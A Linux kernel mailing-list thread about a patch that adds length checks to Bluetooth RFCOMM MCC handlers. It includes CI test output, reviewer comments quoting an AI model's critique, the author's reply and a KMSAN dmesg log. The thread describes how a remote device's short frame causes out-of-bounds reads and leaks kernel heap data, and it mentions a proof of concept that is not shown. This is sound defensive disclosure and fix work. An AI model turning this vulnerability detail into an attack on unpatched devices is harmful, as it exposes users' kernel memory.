* [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers
@ 2026-04-12 4:54 SeungJu Cheon
2026-04-12 5:59 ` bluez.test.bot
` (2 more replies)
0 siblings, 3 replies; 5+ messages in thread
From: SeungJu Cheon @ 2026-04-12 4:54 UTC (permalink / raw)
To: linux-bluetooth
Cc: marcel, luiz.dentz, kees, kuba, me, shuah, linux-kernel-mentees,
linux-kernel, SeungJu Cheon
rfcomm_recv_pn(), rfcomm_recv_rpn(), rfcomm_recv_rls(), and
rfcomm_recv_msc() cast skb->data to their respective structs
without first checking skb->len. A remote device can send a
short MCC frame, causing out-of-bounds reads from the skb buffer.
For rfcomm_recv_pn(), the uninitialized pn->mtu value is stored
in d->mtu via rfcomm_apply_pn(), then echoed back to the remote
device in the PN response, leaking kernel heap data.
This results in use of uninitialized memory, as reported by KMSAN.
Add explicit skb->len checks against the expected structure size
at the start of each handler before accessing the payload.
=====================================================
BUG: KMSAN: uninit-value in rfcomm_run+0x7eae/0xee90
rfcomm_run+0x7eae/0xee90
kthread+0x53f/0x600
ret_from_fork+0x20f/0x910
ret_from_fork_asm+0x1a/0x30
Uninit was created at:
kmem_cache_alloc_node_noprof+0x3cd/0x12d0
__alloc_skb+0x855/0x1190
vhci_write+0x125/0x960
vfs_write+0xbe1/0x15c0
ksys_write+0x1d9/0x470
__x64_sys_write+0x97/0xf0
x64_sys_call+0x2ff0/0x3ea0
do_syscall_64+0x134/0xf80
entry_SYSCALL_64_after_hwframe+0x77/0x7f
CPU: 0 UID: 0 PID: 3374 Comm: krfcommd Tainted: G W 7.0.0-rc7
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
Kernel panic - not syncing: kmsan.panic set ...
=====================================================
Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: SeungJu Cheon <suunj1331@gmail.com>
---
net/bluetooth/rfcomm/core.c | 40 +++++++++++++++++++++++++++++--------
1 file changed, 32 insertions(+), 8 deletions(-)
diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c
index 611a9a94151e..daeba71a1514 100644
--- a/net/bluetooth/rfcomm/core.c
+++ b/net/bluetooth/rfcomm/core.c
@@ -1431,9 +1431,15 @@ static int rfcomm_apply_pn(struct rfcomm_dlc *d, int cr, struct rfcomm_pn *pn)
static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb)
{
- struct rfcomm_pn *pn = (void *) skb->data;
+ struct rfcomm_pn *pn;
struct rfcomm_dlc *d;
- u8 dlci = pn->dlci;
+ u8 dlci;
+
+ if (skb->len < sizeof(*pn))
+ return -EINVAL;
+
+ pn = (void *) skb->data;
+ dlci = pn->dlci;
BT_DBG("session %p state %ld dlci %d", s, s->state, dlci);
@@ -1483,8 +1489,8 @@ static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb)
static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_buff *skb)
{
- struct rfcomm_rpn *rpn = (void *) skb->data;
- u8 dlci = __get_dlci(rpn->dlci);
+ struct rfcomm_rpn *rpn;
+ u8 dlci;
u8 bit_rate = 0;
u8 data_bits = 0;
@@ -1495,6 +1501,12 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_
u8 xoff_char = 0;
u16 rpn_mask = RFCOMM_RPN_PM_ALL;
+ if (skb->len < sizeof(*rpn))
+ return -EINVAL;
+
+ rpn = (void *) skb->data;
+ dlci = __get_dlci(rpn->dlci);
+
BT_DBG("dlci %d cr %d len 0x%x bitr 0x%x line 0x%x flow 0x%x xonc 0x%x xoffc 0x%x pm 0x%x",
dlci, cr, len, rpn->bit_rate, rpn->line_settings, rpn->flow_ctrl,
rpn->xon_char, rpn->xoff_char, rpn->param_mask);
@@ -1589,8 +1601,14 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_
static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb)
{
- struct rfcomm_rls *rls = (void *) skb->data;
- u8 dlci = __get_dlci(rls->dlci);
+ struct rfcomm_rls *rls;
+ u8 dlci;
+
+ if (skb->len < sizeof(*rls))
+ return -EINVAL;
+
+ rls = (void *) skb->data;
+ dlci = __get_dlci(rls->dlci);
BT_DBG("dlci %d cr %d status 0x%x", dlci, cr, rls->status);
@@ -1608,9 +1626,15 @@ static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb
static int rfcomm_recv_msc(struct rfcomm_session *s, int cr, struct sk_buff *skb)
{
- struct rfcomm_msc *msc = (void *) skb->data;
+ struct rfcomm_msc *msc;
struct rfcomm_dlc *d;
- u8 dlci = __get_dlci(msc->dlci);
+ u8 dlci;
+
+ if (skb->len < sizeof(*msc))
+ return -EINVAL;
+
+ msc = (void *) skb->data;
+ dlci = __get_dlci(msc->dlci);
BT_DBG("dlci %d cr %d v24 0x%x", dlci, cr, msc->v24_sig);
--
2.52.0
^ permalink raw reply related [flat|nested] 5+ messages in thread* RE: Bluetooth: RFCOMM: validate skb length in MCC handlers 2026-04-12 4:54 [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers SeungJu Cheon @ 2026-04-12 5:59 ` bluez.test.bot 2026-04-12 7:37 ` [PATCH] " Paul Menzel 2026-04-13 18:19 ` Luiz Augusto von Dentz 2 siblings, 0 replies; 5+ messages in thread From: bluez.test.bot @ 2026-04-12 5:59 UTC (permalink / raw) To: linux-bluetooth, suunj1331 [-- Attachment #1: Type: text/plain, Size: 7138 bytes --] This is automated email and please do not reply to this email! Dear submitter, Thank you for submitting the patches to the linux bluetooth mailing list. This is a CI test results with your patch series: PW Link:https://patchwork.kernel.org/project/bluetooth/list/?series=1080259 ---Test result--- Test Summary: CheckPatch PENDING 0.52 seconds GitLint PENDING 0.27 seconds SubjectPrefix PASS 0.08 seconds BuildKernel PASS 24.64 seconds CheckAllWarning PASS 27.00 seconds CheckSparse PASS 25.67 seconds BuildKernel32 PASS 23.96 seconds TestRunnerSetup PASS 530.19 seconds TestRunner_l2cap-tester FAIL 28.87 seconds TestRunner_iso-tester PASS 38.61 seconds TestRunner_bnep-tester PASS 6.57 seconds TestRunner_mgmt-tester FAIL 118.31 seconds TestRunner_rfcomm-tester PASS 9.80 seconds TestRunner_sco-tester FAIL 14.74 seconds TestRunner_ioctl-tester PASS 10.65 seconds TestRunner_mesh-tester FAIL 12.57 seconds TestRunner_smp-tester PASS 8.90 seconds TestRunner_userchan-tester PASS 7.02 seconds TestRunner_6lowpan-tester FAIL 9.00 seconds IncrementalBuild PENDING 0.32 seconds Details ############################## Test: CheckPatch - PENDING Desc: Run checkpatch.pl script Output: ############################## Test: GitLint - PENDING Desc: Run gitlint Output: ############################## Test: TestRunner_l2cap-tester - FAIL Desc: Run l2cap-tester with test-runner Output: Total: 96, Passed: 95 (99.0%), Failed: 1, Not Run: 0 Failed Test Cases L2CAP BR/EDR Server - Set PHY 3M Failed 0.119 seconds ############################## Test: TestRunner_mgmt-tester - FAIL Desc: Run mgmt-tester with test-runner Output: Total: 494, Passed: 489 (99.0%), Failed: 1, Not Run: 4 Failed Test Cases Read Exp Feature - Success Failed 0.110 seconds ############################## Test: TestRunner_sco-tester - FAIL Desc: Run sco-tester with test-runner Output: WARNING: possible circular locking dependency detected 7.0.0-rc2-g5632c26a4923 #1 Not tainted ------------------------------------------------------ kworker/u5:2/117 is trying to acquire lock: ffff888001abe240 (sk_lock-AF_BLUETOOTH-BTPROTO_SCO){+.+.}-{0:0}, at: sco_connect_cfm+0x358/0x8d0 but task is already holding lock: ffff8880025fd220 (&conn->lock){+.+.}-{3:3}, at: sco_connect_cfm+0x22d/0x8d0 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (&conn->lock){+.+.}-{3:3}: lock_acquire+0xf7/0x2c0 _raw_spin_lock+0x2a/0x40 sco_sock_connect+0x4d7/0x1280 __sys_connect+0x1a3/0x260 __x64_sys_connect+0x6e/0xb0 do_syscall_64+0xa0/0x570 entry_SYSCALL_64_after_hwframe+0x74/0x7c -> #0 (sk_lock-AF_BLUETOOTH-BTPROTO_SCO){+.+.}-{0:0}: check_prev_add+0xe9/0xc70 __lock_acquire+0x1457/0x1df0 lock_acquire+0xf7/0x2c0 lock_sock_nested+0x36/0xd0 sco_connect_cfm+0x358/0x8d0 hci_sync_conn_complete_evt+0x3d3/0x8e0 hci_event_packet+0x74f/0xb10 hci_rx_work+0x398/0xd00 process_scheduled_works+0xb16/0x1ac0 worker_thread+0x4ff/0xba0 kthread+0x368/0x490 ret_from_fork+0x498/0x7e0 ret_from_fork_asm+0x19/0x30 other info that might help us debug this: ... BUG: sleeping function called from invalid context at net/core/sock.c:3782 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 117, name: kworker/u5:2 preempt_count: 1, expected: 0 RCU nest depth: 0, expected: 0 INFO: lockdep is turned off. CPU: 0 UID: 0 PID: 117 Comm: kworker/u5:2 Not tainted 7.0.0-rc2-g5632c26a4923 #1 PREEMPT(lazy) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Workqueue: hci0 hci_rx_work Call Trace: <TASK> dump_stack_lvl+0x49/0x60 __might_resched+0x2ea/0x500 lock_sock_nested+0x47/0xd0 ? sco_connect_cfm+0x358/0x8d0 sco_connect_cfm+0x358/0x8d0 ? hci_debugfs_create_conn+0x190/0x210 ? __pfx_sco_connect_cfm+0x10/0x10 hci_sync_conn_complete_evt+0x3d3/0x8e0 hci_event_packet+0x74f/0xb10 ? __pfx_hci_sync_conn_complete_evt+0x10/0x10 ? __pfx_hci_event_packet+0x10/0x10 ? mark_held_locks+0x49/0x80 ? lockdep_hardirqs_on_prepare+0xd4/0x180 ? _raw_spin_unlock_irqrestore+0x2c/0x50 hci_rx_work+0x398/0xd00 process_scheduled_works+0xb16/0x1ac0 ? __pfx_process_scheduled_works+0x10/0x10 ? lock_acquire+0xf7/0x2c0 ? lock_is_held_type+0x9b/0x110 ? __pfx_hci_rx_work+0x10/0x10 worker_thread+0x4ff/0xba0 ? _raw_spin_unlock_irqrestore+0x2c/0x50 ? __pfx_worker_thread+0x10/0x10 kthread+0x368/0x490 ? _raw_spin_unlock_irq+0x23/0x40 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x498/0x7e0 ? __pfx_ret_from_fork+0x10/0x10 ? __switch_to+0x9e4/0xe50 ? __switch_to_asm+0x32/0x60 ... Total: 30, Passed: 30 (100.0%), Failed: 0, Not Run: 0 ############################## Test: TestRunner_mesh-tester - FAIL Desc: Run mesh-tester with test-runner Output: Total: 10, Passed: 8 (80.0%), Failed: 2, Not Run: 0 Failed Test Cases Mesh - Send cancel - 1 Timed out 2.538 seconds Mesh - Send cancel - 2 Timed out 1.993 seconds ############################## Test: TestRunner_6lowpan-tester - FAIL Desc: Run 6lowpan-tester with test-runner Output: WARNING: possible circular locking dependency detected 7.0.0-rc2-g5632c26a4923 #1 Not tainted ------------------------------------------------------ kworker/0:1/11 is trying to acquire lock: ffff8880026f4940 ((wq_completion)hci0#2){+.+.}-{0:0}, at: touch_wq_lockdep_map+0x75/0x180 but task is already holding lock: ffffffff86c4d720 (rtnl_mutex){+.+.}-{4:4}, at: lowpan_unregister_netdev+0xd/0x30 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #4 (rtnl_mutex){+.+.}-{4:4}: lock_acquire+0xf7/0x2c0 __mutex_lock+0x16b/0x1fc0 lowpan_register_netdev+0x11/0x30 chan_ready_cb+0x836/0xd00 l2cap_recv_frame+0x6a06/0x8920 l2cap_recv_acldata+0x790/0xdf0 hci_rx_work+0x500/0xd00 process_scheduled_works+0xb16/0x1ac0 worker_thread+0x4ff/0xba0 kthread+0x368/0x490 ret_from_fork+0x498/0x7e0 ret_from_fork_asm+0x19/0x30 -> #3 (&chan->lock#3/1){+.+.}-{4:4}: lock_acquire+0xf7/0x2c0 __mutex_lock+0x16b/0x1fc0 l2cap_chan_connect+0x74e/0x1980 lowpan_control_write+0x523/0x660 full_proxy_write+0x10b/0x190 vfs_write+0x1c0/0xf60 ksys_write+0xf1/0x1d0 do_syscall_64+0xa0/0x570 entry_SYSCALL_64_after_hwframe+0x74/0x7c -> #2 (&conn->lock){+.+.}-{4:4}: ... Total: 8, Passed: 8 (100.0%), Failed: 0, Not Run: 0 ############################## Test: IncrementalBuild - PENDING Desc: Incremental build with the patches in the series Output: https://github.com/bluez/bluetooth-next/pull/70 --- Regards, Linux Bluetooth ^ permalink raw reply [flat|nested] 5+ messages in thread
* Re: [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers 2026-04-12 4:54 [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers SeungJu Cheon 2026-04-12 5:59 ` bluez.test.bot @ 2026-04-12 7:37 ` Paul Menzel 2026-04-12 12:39 ` SeungJu Cheon 2026-04-13 18:19 ` Luiz Augusto von Dentz 2 siblings, 1 reply; 5+ messages in thread From: Paul Menzel @ 2026-04-12 7:37 UTC (permalink / raw) To: SeungJu Cheon Cc: linux-bluetooth, marcel, luiz.dentz, kees, kuba, me, shuah, linux-kernel-mentees, linux-kernel Dear SeungJu, Thank you for the patch. Am 12.04.26 um 06:54 schrieb SeungJu Cheon: > rfcomm_recv_pn(), rfcomm_recv_rpn(), rfcomm_recv_rls(), and > rfcomm_recv_msc() cast skb->data to their respective structs > without first checking skb->len. A remote device can send a > short MCC frame, causing out-of-bounds reads from the skb buffer. Nice catch. Do you have a reproducer to create such a short MCC frame? > For rfcomm_recv_pn(), the uninitialized pn->mtu value is stored > in d->mtu via rfcomm_apply_pn(), then echoed back to the remote > device in the PN response, leaking kernel heap data. > > This results in use of uninitialized memory, as reported by KMSAN. > > Add explicit skb->len checks against the expected structure size > at the start of each handler before accessing the payload. > > ===================================================== > BUG: KMSAN: uninit-value in rfcomm_run+0x7eae/0xee90 > rfcomm_run+0x7eae/0xee90 > kthread+0x53f/0x600 > ret_from_fork+0x20f/0x910 > ret_from_fork_asm+0x1a/0x30 > > Uninit was created at: > kmem_cache_alloc_node_noprof+0x3cd/0x12d0 > __alloc_skb+0x855/0x1190 > vhci_write+0x125/0x960 > vfs_write+0xbe1/0x15c0 > ksys_write+0x1d9/0x470 > __x64_sys_write+0x97/0xf0 > x64_sys_call+0x2ff0/0x3ea0 > do_syscall_64+0x134/0xf80 > entry_SYSCALL_64_after_hwframe+0x77/0x7f > > CPU: 0 UID: 0 PID: 3374 Comm: krfcommd Tainted: G W 7.0.0-rc7 > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) > Kernel panic - not syncing: kmsan.panic set ... > ===================================================== > > Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") > Signed-off-by: SeungJu Cheon <suunj1331@gmail.com> > --- > net/bluetooth/rfcomm/core.c | 40 +++++++++++++++++++++++++++++-------- > 1 file changed, 32 insertions(+), 8 deletions(-) > > diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c > index 611a9a94151e..daeba71a1514 100644 > --- a/net/bluetooth/rfcomm/core.c > +++ b/net/bluetooth/rfcomm/core.c > @@ -1431,9 +1431,15 @@ static int rfcomm_apply_pn(struct rfcomm_dlc *d, int cr, struct rfcomm_pn *pn) > > static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_pn *pn = (void *) skb->data; > + struct rfcomm_pn *pn; > struct rfcomm_dlc *d; > - u8 dlci = pn->dlci; > + u8 dlci; > + > + if (skb->len < sizeof(*pn)) > + return -EINVAL; > + > + pn = (void *) skb->data; > + dlci = pn->dlci; gemini/gemini-3.1-pro-preview comments [1]. No idea if it’s a valid comment: > Before these handlers are reached, rfcomm_recv_mcc() unconditionally casts > skb->data to struct rfcomm_mcc * and reads mcc->type and mcc->len. Does > this leave an out-of-bounds read unpatched if a remote device sends an MCC > frame with 0 or 1 bytes of payload? > Additionally, if rfcomm_recv_frame() unconditionally trims the FCS with > skb->len--; skb->tail--;, could a 0-byte payload cause skb->len to > underflow to UINT_MAX? > Since skb->len is unsigned, this new check (UINT_MAX < 8) would evaluate to > false, potentially bypassing this protection entirely. > > BT_DBG("session %p state %ld dlci %d", s, s->state, dlci); > > @@ -1483,8 +1489,8 @@ static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct sk_buff *skb) > > static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_buff *skb) > { > - struct rfcomm_rpn *rpn = (void *) skb->data; > - u8 dlci = __get_dlci(rpn->dlci); > + struct rfcomm_rpn *rpn; > + u8 dlci; > > u8 bit_rate = 0; > u8 data_bits = 0; > @@ -1495,6 +1501,12 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_ > u8 xoff_char = 0; > u16 rpn_mask = RFCOMM_RPN_PM_ALL; > > + if (skb->len < sizeof(*rpn)) > + return -EINVAL; gemini/gemini-3.1-pro-preview comments [1]: > Does this unconditionally drop legitimate 1-byte Remote Port Negotiation > (RPN) requests? > Looking at the existing code further down in rfcomm_recv_rpn(): > if (len == 1) { > /* This is a request, return default (according to ETSI TS 07.10) settings */ > ... > Since sizeof(struct rfcomm_rpn) is 8 bytes, enforcing this minimum length > would reject valid 1-byte queries allowed by the ETSI TS 07.10 standard. > + > + rpn = (void *) skb->data; > + dlci = __get_dlci(rpn->dlci); > + > BT_DBG("dlci %d cr %d len 0x%x bitr 0x%x line 0x%x flow 0x%x xonc 0x%x xoffc 0x%x pm 0x%x", > dlci, cr, len, rpn->bit_rate, rpn->line_settings, rpn->flow_ctrl, > rpn->xon_char, rpn->xoff_char, rpn->param_mask); > @@ -1589,8 +1601,14 @@ static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, struct sk_ > > static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_rls *rls = (void *) skb->data; > - u8 dlci = __get_dlci(rls->dlci); > + struct rfcomm_rls *rls; > + u8 dlci; > + > + if (skb->len < sizeof(*rls)) > + return -EINVAL; > + > + rls = (void *) skb->data; > + dlci = __get_dlci(rls->dlci); > > BT_DBG("dlci %d cr %d status 0x%x", dlci, cr, rls->status); > > @@ -1608,9 +1626,15 @@ static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct sk_buff *skb > > static int rfcomm_recv_msc(struct rfcomm_session *s, int cr, struct sk_buff *skb) > { > - struct rfcomm_msc *msc = (void *) skb->data; > + struct rfcomm_msc *msc; > struct rfcomm_dlc *d; > - u8 dlci = __get_dlci(msc->dlci); > + u8 dlci; > + > + if (skb->len < sizeof(*msc)) > + return -EINVAL; > + > + msc = (void *) skb->data; > + dlci = __get_dlci(msc->dlci); > > BT_DBG("dlci %d cr %d v24 0x%x", dlci, cr, msc->v24_sig); > Kind regards, Paul [1]: https://sashiko.dev/#/patchset/20260412045457.53100-1-suunj1331%40gmail.com ^ permalink raw reply [flat|nested] 5+ messages in thread
* Re: [PATCH] Bluetooth: RFCOMM: validate skb length in MCC handlers 2026-04-12 7:37 ` [PATCH] " Paul Menzel @ 2026-04-12 12:39 ` SeungJu Cheon 0 siblings, 0 replies; 5+ messages in thread From: SeungJu Cheon @ 2026-04-12 12:39 UTC (permalink / raw) To: Paul Menzel Cc: linux-bluetooth, marcel, luiz.dentz, kees, kuba, me, linux-kernel-mentees, linux-kernel, skhan [-- Attachment #1.1: Type: text/plain, Size: 7455 bytes --] Hi Paul, Thanks for the review. > Nice catch. Do you have a reproducer to create such a short MCC frame? Yes, a PoC is attached. It uses VHCI to inject malformed (short) MCC frames. > Before these handlers are reached, rfcomm_recv_mcc() unconditionally casts > skb->data to struct rfcomm_mcc * and reads mcc->type and mcc->len. Good point. I'll add a sizeof(struct rfcomm_mcc) check in rfcomm_recv_mcc() before accessing these fields in v2. > if rfcomm_recv_frame() unconditionally trims the FCS with skb->len--; > could a 0-byte payload cause skb->len to underflow to UINT_MAX? I'll review rfcomm_recv_frame() and add a minimum length check if needed. > Does this unconditionally drop legitimate 1-byte RPN requests? You're right. In v2, I'll update rfcomm_recv_rpn() to first check 1 byte for DLCI, then validate full struct size only when len > 1. Thanks, SeungJu On Sun, Apr 12, 2026 at 4:38 PM Paul Menzel <pmenzel@molgen.mpg.de> wrote: > Dear SeungJu, > > > Thank you for the patch. > > Am 12.04.26 um 06:54 schrieb SeungJu Cheon: > > rfcomm_recv_pn(), rfcomm_recv_rpn(), rfcomm_recv_rls(), and > > rfcomm_recv_msc() cast skb->data to their respective structs > > without first checking skb->len. A remote device can send a > > short MCC frame, causing out-of-bounds reads from the skb buffer. > > Nice catch. Do you have a reproducer to create such a short MCC frame? > > > For rfcomm_recv_pn(), the uninitialized pn->mtu value is stored > > in d->mtu via rfcomm_apply_pn(), then echoed back to the remote > > device in the PN response, leaking kernel heap data. > > > > This results in use of uninitialized memory, as reported by KMSAN. > > > > Add explicit skb->len checks against the expected structure size > > at the start of each handler before accessing the payload. > > > > ===================================================== > > BUG: KMSAN: uninit-value in rfcomm_run+0x7eae/0xee90 > > rfcomm_run+0x7eae/0xee90 > > kthread+0x53f/0x600 > > ret_from_fork+0x20f/0x910 > > ret_from_fork_asm+0x1a/0x30 > > > > Uninit was created at: > > kmem_cache_alloc_node_noprof+0x3cd/0x12d0 > > __alloc_skb+0x855/0x1190 > > vhci_write+0x125/0x960 > > vfs_write+0xbe1/0x15c0 > > ksys_write+0x1d9/0x470 > > __x64_sys_write+0x97/0xf0 > > x64_sys_call+0x2ff0/0x3ea0 > > do_syscall_64+0x134/0xf80 > > entry_SYSCALL_64_after_hwframe+0x77/0x7f > > > > CPU: 0 UID: 0 PID: 3374 Comm: krfcommd Tainted: G W > 7.0.0-rc7 > > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) > > Kernel panic - not syncing: kmsan.panic set ... > > ===================================================== > > > > Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") > > Signed-off-by: SeungJu Cheon <suunj1331@gmail.com> > > --- > > net/bluetooth/rfcomm/core.c | 40 +++++++++++++++++++++++++++++-------- > > 1 file changed, 32 insertions(+), 8 deletions(-) > > > > diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c > > index 611a9a94151e..daeba71a1514 100644 > > --- a/net/bluetooth/rfcomm/core.c > > +++ b/net/bluetooth/rfcomm/core.c > > @@ -1431,9 +1431,15 @@ static int rfcomm_apply_pn(struct rfcomm_dlc *d, > int cr, struct rfcomm_pn *pn) > > > > static int rfcomm_recv_pn(struct rfcomm_session *s, int cr, struct > sk_buff *skb) > > { > > - struct rfcomm_pn *pn = (void *) skb->data; > > + struct rfcomm_pn *pn; > > struct rfcomm_dlc *d; > > - u8 dlci = pn->dlci; > > + u8 dlci; > > + > > + if (skb->len < sizeof(*pn)) > > + return -EINVAL; > > + > > + pn = (void *) skb->data; > > + dlci = pn->dlci; > > gemini/gemini-3.1-pro-preview comments [1]. No idea if it’s a valid > comment: > > > Before these handlers are reached, rfcomm_recv_mcc() unconditionally > casts > > skb->data to struct rfcomm_mcc * and reads mcc->type and mcc->len. Does > > this leave an out-of-bounds read unpatched if a remote device sends an > MCC > > frame with 0 or 1 bytes of payload? > > Additionally, if rfcomm_recv_frame() unconditionally trims the FCS with > > skb->len--; skb->tail--;, could a 0-byte payload cause skb->len to > > underflow to UINT_MAX? > > Since skb->len is unsigned, this new check (UINT_MAX < 8) would evaluate > to > > false, potentially bypassing this protection entirely. > > > > BT_DBG("session %p state %ld dlci %d", s, s->state, dlci); > > > > @@ -1483,8 +1489,8 @@ static int rfcomm_recv_pn(struct rfcomm_session > *s, int cr, struct sk_buff *skb) > > > > static int rfcomm_recv_rpn(struct rfcomm_session *s, int cr, int len, > struct sk_buff *skb) > > { > > - struct rfcomm_rpn *rpn = (void *) skb->data; > > - u8 dlci = __get_dlci(rpn->dlci); > > + struct rfcomm_rpn *rpn; > > + u8 dlci; > > > > u8 bit_rate = 0; > > u8 data_bits = 0; > > @@ -1495,6 +1501,12 @@ static int rfcomm_recv_rpn(struct rfcomm_session > *s, int cr, int len, struct sk_ > > u8 xoff_char = 0; > > u16 rpn_mask = RFCOMM_RPN_PM_ALL; > > > > + if (skb->len < sizeof(*rpn)) > > + return -EINVAL; > > gemini/gemini-3.1-pro-preview comments [1]: > > > Does this unconditionally drop legitimate 1-byte Remote Port Negotiation > > (RPN) requests? > > Looking at the existing code further down in rfcomm_recv_rpn(): > > if (len == 1) { > > /* This is a request, return default (according to ETSI TS > 07.10) settings */ > > ... > > Since sizeof(struct rfcomm_rpn) is 8 bytes, enforcing this minimum length > > would reject valid 1-byte queries allowed by the ETSI TS 07.10 standard. > > > > + > > + rpn = (void *) skb->data; > > + dlci = __get_dlci(rpn->dlci); > > + > > BT_DBG("dlci %d cr %d len 0x%x bitr 0x%x line 0x%x flow 0x%x xonc > 0x%x xoffc 0x%x pm 0x%x", > > dlci, cr, len, rpn->bit_rate, rpn->line_settings, > rpn->flow_ctrl, > > rpn->xon_char, rpn->xoff_char, rpn->param_mask); > > @@ -1589,8 +1601,14 @@ static int rfcomm_recv_rpn(struct rfcomm_session > *s, int cr, int len, struct sk_ > > > > static int rfcomm_recv_rls(struct rfcomm_session *s, int cr, struct > sk_buff *skb) > > { > > - struct rfcomm_rls *rls = (void *) skb->data; > > - u8 dlci = __get_dlci(rls->dlci); > > + struct rfcomm_rls *rls; > > + u8 dlci; > > + > > + if (skb->len < sizeof(*rls)) > > + return -EINVAL; > > + > > + rls = (void *) skb->data; > > + dlci = __get_dlci(rls->dlci); > > > > BT_DBG("dlci %d cr %d status 0x%x", dlci, cr, rls->status); > > > > @@ -1608,9 +1626,15 @@ static int rfcomm_recv_rls(struct rfcomm_session > *s, int cr, struct sk_buff *skb > > > > static int rfcomm_recv_msc(struct rfcomm_session *s, int cr, struct > sk_buff *skb) > > { > > - struct rfcomm_msc *msc = (void *) skb->data; > > + struct rfcomm_msc *msc; > > struct rfcomm_dlc *d; > > - u8 dlci = __get_dlci(msc->dlci); > > + u8 dlci; > > + > > + if (skb->len < sizeof(*msc)) > > + return -EINVAL; > > + > > + msc = (void *) skb->data; > > + dlci = __get_dlci(msc->dlci); > > > > BT_DBG("dlci %d cr %d v24 0x%x", dlci, cr, msc->v24_sig); > > > > > Kind regards, > > Paul > > > [1]: > https://sashiko.dev/#/patchset/20260412045457.53100-1-suunj1331%40gmail.com > [-- Attachment #1.2: Type: text/html, Size: 9259 bytes --] [-- Attachment #2: dmesg.txt --] [-- Type: text/plain, Size: 3846 bytes --] [ 441.374768][ T3375] ===================================================== [ 441.375140][ T3375] BUG: KMSAN: uninit-value in rfcomm_run+0x7eae/0xee90 [ 441.375422][ T3375] rfcomm_run+0x7eae/0xee90 [ 441.375620][ T3375] kthread+0x53f/0x600 [ 441.375801][ T3375] ret_from_fork+0x20f/0x910 [ 441.375998][ T3375] ret_from_fork_asm+0x1a/0x30 [ 441.376213][ T3375] [ 441.376314][ T3375] Uninit was created at: [ 441.376520][ T3375] kmem_cache_alloc_node_noprof+0x3cd/0x12d0 [ 441.376771][ T3375] __alloc_skb+0x855/0x1190 [ 441.376968][ T3375] vhci_write+0x125/0x960 [ 441.377165][ T3375] vfs_write+0xbe1/0x15c0 [ 441.377353][ T3375] ksys_write+0x1d9/0x470 [ 441.377541][ T3375] __x64_sys_write+0x97/0xf0 [ 441.377742][ T3375] x64_sys_call+0x2ff0/0x3ea0 [ 441.377945][ T3375] do_syscall_64+0x134/0xf80 [ 441.378152][ T3375] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 441.378396][ T3375] [ 441.378503][ T3375] CPU: 1 UID: 0 PID: 3375 Comm: krfcommd Tainted: G W 7.0.0-rc7-00227-g9a9c8ce300cd #5 PREEMPT(full) [ 441.378984][ T3375] Tainted: [W]=WARN [ 441.379143][ T3375] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-9.fc43 06/10/2025 [ 441.379513][ T3375] ===================================================== [ 441.379782][ T3375] Disabling lock debugging due to kernel taint [ 441.380022][ T3375] Kernel panic - not syncing: kmsan.panic set ... [ 441.380282][ T3375] CPU: 1 UID: 0 PID: 3375 Comm: krfcommd Tainted: G B W 7.0.0-rc7-00227-g9a9c8ce300cd #5 PREEMPT(full) [ 441.380763][ T3375] Tainted: [B]=BAD_PAGE, [W]=WARN [ 441.380969][ T3375] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-9.fc43 06/10/2025 [ 441.381339][ T3375] Call Trace: [ 441.381477][ T3375] <TASK> [ 441.381602][ T3375] __dump_stack+0x26/0x30 [ 441.381796][ T3375] dump_stack_lvl+0x50/0x1c0 [ 441.382000][ T3375] ? dump_stack+0x12/0x25 [ 441.382195][ T3375] dump_stack+0x1e/0x25 [ 441.382382][ T3375] vpanic+0x7b4/0x1430 [ 441.382573][ T3375] panic+0x15d/0x160 [ 441.382765][ T3375] ? __msan_metadata_ptr_for_store_1+0x27/0x40 [ 441.383042][ T3375] kmsan_report+0x31a/0x320 [ 441.383266][ T3375] ? __msan_warning+0x1b/0x30 [ 441.383481][ T3375] ? rfcomm_run+0x7eae/0xee90 [ 441.383694][ T3375] ? kthread+0x53f/0x600 [ 441.383889][ T3375] ? ret_from_fork+0x20f/0x910 [ 441.384104][ T3375] ? ret_from_fork_asm+0x1a/0x30 [ 441.384325][ T3375] ? __msan_warning+0x1b/0x30 [ 441.384536][ T3375] ? filter_irq_stacks+0x13f/0x190 [ 441.384764][ T3375] ? kmsan_get_metadata+0xf1/0x160 [ 441.384984][ T3375] ? kmsan_internal_set_shadow_origin+0x7a/0x110 